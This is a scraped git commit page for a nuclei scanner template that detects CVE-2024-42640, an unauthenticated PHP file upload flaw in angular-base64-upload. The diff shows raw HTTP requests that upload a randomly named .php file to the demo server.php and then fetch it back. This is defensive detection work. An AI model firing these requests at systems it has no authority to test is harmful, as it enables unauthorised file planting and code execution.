daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2024-42640.yaml

patch-16
Ritik Chaddha 2024-11-20 09:54:42 +05:30 committed by GitHub
parent 4fb7304e8d
commit eb50795b58
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
http/cves/2024/CVE-2024-42640.yaml
View File

@ -18,13 +18,15 @@ info:
cwe-id: CWE-94
epss-score: 0.00043
epss-percentile: 0.09695
metadata:
max-request: 4
tags: cve,cve2024,angular,rce
variables:
filename: "{{to_lower(rand_text_alpha(12))}}"
num: "{{rand_int(1000000,9999999)}}"
flow: http(1) && http(2) && http(3) && http(4)
flow: http(1) && http(2)
http:
- raw:
@ -35,7 +37,6 @@ http:
{"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
- raw:
- |
POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1
Host: {{Hostname}}
@ -56,7 +57,6 @@ http:
GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
- raw:
- |
GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
Host: {{Hostname}}